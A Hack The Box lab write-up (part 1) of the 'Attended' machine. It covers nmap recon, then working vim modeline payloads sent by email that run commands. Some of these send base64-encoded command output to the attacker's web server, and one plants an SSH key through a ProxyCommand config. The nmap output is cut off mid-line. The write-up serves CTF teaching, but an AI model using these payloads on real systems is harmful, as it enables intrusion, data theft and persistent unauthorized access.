Hackthebox Attended WriteUp (PART 1)
Overview:
Attended is a one of the craziest hard machine in Hackthebox that includes exploiting a binary file. The foothold is to phishing the email smtp port and take advantage of vulnerable vim version to get code execution, after get into the machine there is another host running port 2222 and there is a anthkey executable. After analyzed this anthkey and start bianry exploitation, it allows write a ssh key into the root directory and gives access to root. The first part of blog will explain the foothod and the blog part 2 will explain how to exploit that binary. With all that being said, let’s just jump in!
Reconnaissance:
┌──(root💀kali)-[~/htb/boxes/attdended]
└─# cat sc
# Nmap 7.91 scan initiated Tue May 4 17:53:01 2021 as: nmap -sC -sV -v -oN sc 10.10.10.221
Nmap scan report for 10.10.10.221
Host is up (0.23s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 4f:08:48:10:a2:89:3b:bd:4a:c6:81:03:cb:20:04:f5 (RSA)
| 256 1a:41:82:21:9f:07:9d:cd:61:97:e7:fe:96:3a:8f:b0 (ECDSA)
|_ 256 e0:6e:3d:52:ca:5a:7b:4a:11:cb:94:ef:af:49:07:aa (ED25519)
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
| 5.5.1 Invalid command: Pipelining not supported
| Hello:
| 220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
| 5.5.1 Invalid command: EHLO requires domain name
| Help:
| 220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
| 214- This is OpenSMTPD
| 214- To report bugs in the implementation, please contact bugs@openbsd.org
| 214- with full details
| 2.0.0: End of HELP info
| NULL:
|_ 220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
| smtp-commands: proudly setup by guly for attended.htb Hello nmap.scanme.org [10.10.14.16], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ This is OpenSMTPD To report bugs in the implementation, please contact bugs@openbsd.org with full details 2.0.0: End of HELP info
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.91%I=7%D=5/4%Time=6091C25D%P=x86_64-pc-linux-gnu%r(NULL,The Foothold:
Set up a simple SMTP server with Python’s smtpd module to receive mails
python3 -m smtpd -n -c DebuggingServer 10.10.x.x:25
After few minutes the python server received message back from the server. And there is user called freshness? So lets send a email to him.
Looks like he wants us to attach a file So lets attach a file.
He will open vim immediately So if there is a vim command execution vulnerability that makes him execute commands for us?
After Googling around, Found this github page has the thing we wanted.
┌──(root💀kali)-[~/htb/boxes/attdended]
└─# cat ping.txt
:!uname -a && ping -c 1 10.10.14.16 ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="Send this payload to ping myself. And l got ping back so we have code executions now.
The previous email said that to check the /home/shared folder so let’s have it a go. Since we can’t just ls -la to see the output so we need to make a request and hit to a web server we hosted. The payload looks like below.
root@kali:~/htb/boxes/attendend# cat dir.txt
:!python2 -c "import requests,base64,subprocess;requests.get('http://10.10.14.6/'+base64.b64encode(subprocess.check_output('ls -la',shell=True)))"||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
We got hit from the webserver and let’s decode it.
And there is a cofig file in the /tmp directory
Strings this file and we are able to see the contents in it.
:!python2 -c "import requests,base64,subprocess;requests.get('http://10.10.14.6/'+base64.b64encode(subprocess.check_output('strings /home/guly/tmp/.config.swp',shell=True)))"||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=
From the email the the freshness said that he will test the /home/shared/config file So, Its likely there is a cronjob to from freshness to test ssh config and the guly also has write access to the /tmp/folder. Therefore, We can leverage ProxyCimmand from ssh config.
root@kali:~/htb/boxes/attendend# cat sshproxy.txt
:!echo -en 'Host *\n User freshness\n ControlMaster auto\n ControlPath /tmp/%r@%h:%p\n ControlPersist 4h\n TCPKeepAlive yes\n ServerAliveInterval 60\n ProxyCommand echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJAME3V/1wyVDBWWvkcOTrkscRHxBfHVYXRkc3hdz/3k root@kali >>/home/freshness/.ssh/authorized_keys\n' > /home/shared/config ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="Send it and ssh login to freshness’s machine.
Privilege Escalation:
Looking at the note and notice there is another host running.
Build a simple bash script to scan running port on the machine.
This new host is running port 2222.
Next, there is a authkeys binary and in the next PART 2, I will explain how to exploit this binary file and it’s the craziest part of this box!
